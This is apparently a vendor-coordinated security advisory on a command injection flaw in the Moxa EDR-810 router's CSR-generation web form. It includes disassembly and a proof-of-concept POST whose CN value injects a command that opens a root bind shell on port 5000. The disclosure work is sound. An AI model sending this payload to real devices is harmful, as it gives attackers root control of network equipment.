### Summary
An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the CN= parm in the "/goform/net_WebCSRGen" uri to trigger this vulnerability.
### Tested Versions
Moxa EDR-810 V4.1 build 17030317
### Product URLs
https://www.moxa.com/product/EDR-810.htm
### CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
### CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
### Details
Once logged in to the device's web interface, a user can generate a X.509 CSR for the VPN via a POST to "/goform/net_WebCSRGen". One of the parameters that gets sent with this post request is the CN parameter. An attacker can inject OS commands to get a root shell.
Vulnerable URI: /goform/net_WebCSRGen Vulnerable Parameter: `CN=`
```
SUB R3, R11, #-command
MOV R0, R3 ; haystack
LDR R1, =aCn ; "CN="
BL strstr
MOV R3, R0
STR R3, [R11,#var_14]
LDR R3, [R11,#var_14]
CMP R3, #0
BEQ loc_40AC8
...
SUB R3, R11, #-s
MOV R0, R3 ; command
BL system
```
### Exploit Proof-of-Concept
The following POST will start a root shell on port 5000.
```
POST: /goform/net_WebCSRGen HTTP/1.1
Host: DeviceIP
Cooke: Valid-Cookie
Content-Type: japplication/x-www-form-urlencoded
CN=`tcpsvd 0 5000 /bin/bash`#
```
### Timeline
* 2017-11-15 - Vendor Disclosure
* 2017-11-19 - Vendor Acknowledged
* 2017-12-25 - Vendor provided timeline for fix (Feb 2018)
* 2018-01-04 - Timeline pushed to mid-March per vendor
* 2018-03-24 - Talos follow up with vendor for release timeline
* 2018-03-26 - Timeline pushed to 4/13/18 per vendor
* 2018-04-12 - Vendor patched & published new firmware on website
* 2018-04-13 - Public Release
暂无评论